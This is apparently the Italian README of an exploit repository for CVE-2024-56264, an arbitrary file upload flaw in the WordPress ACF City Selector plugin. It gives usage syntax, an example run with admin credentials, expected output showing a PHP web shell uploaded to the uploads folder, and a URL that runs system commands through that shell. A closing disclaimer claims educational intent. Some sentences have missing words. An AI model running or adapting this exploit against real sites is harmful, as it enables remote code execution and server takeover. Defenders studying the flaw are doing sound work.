
Plugin WordPress ACF City Selector <= 1.14.0 - Vulnerabilità di caricamento arbitrario di file
Questa repository contiene un exploit per CVE-2024-56264, una vulnerabilità di Caricamento Arbitrario di File presente nel plugin WordPress ACF City Selector (versioni <= 1.14.0). Questa vulnerabilità consente a un attaccante di caricare un file PHP dannoso (web shell) su un'istanza WordPress vulnerabile ed eseguire comandi arbitrari sul server.
<= 1.14.0Il plugin ACF City Selector non riesce a validare correttamente i file caricati, consentendo agli attaccanti di e caricare . Una volta caricato un file PHP dannoso, un attaccante può eseguire comandi di sistema remotamente, portando al .
Assicurarsi che quanto segue sia installato prima di eseguire lo script:
requests (installabile con: pip install requests)È possibile installare tutte le dipendenze richieste utilizzando:
pip install -r requirements.txt
Esecuzione dell'exploit:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
Plugin WordPress ACF City Selector <= 1.14.0 - Vulnerabilità di caricamento arbitrario di file
opzioni:
-h, --help mostra questo messaggio di aiuto ed esci
--url URL URL di base del sito web (es., http://192.168.100.74/wordpress)
--username USERNAME Nome utente WordPress
--password PASSWORD Password WordPress
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
In caso di sfruttamento riuscito, dovresti vedere:
[+] Versione del plugin rilevata: 1.14.0
[+] Versione vulnerabile rilevata! Procedo con lo sfruttamento.
[+] Accesso effettuato con successo.
[+] Nonce estratto: abc1234
[+] Shell caricata con successo: http://wordpress/wp-content/uploads/acfcs/q.php
In caso di successo, accedi alla shell caricata tramite:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Questo consente l'esecuzione remota di comandi sul server.
Questo script è destinato esclusivamente a scopi didattici e di test di sicurezza autorizzati. L'uso non autorizzato è illegale e può comportare gravi conseguenze. L'autore non è responsabile per qualsiasi uso improprio di questo exploit.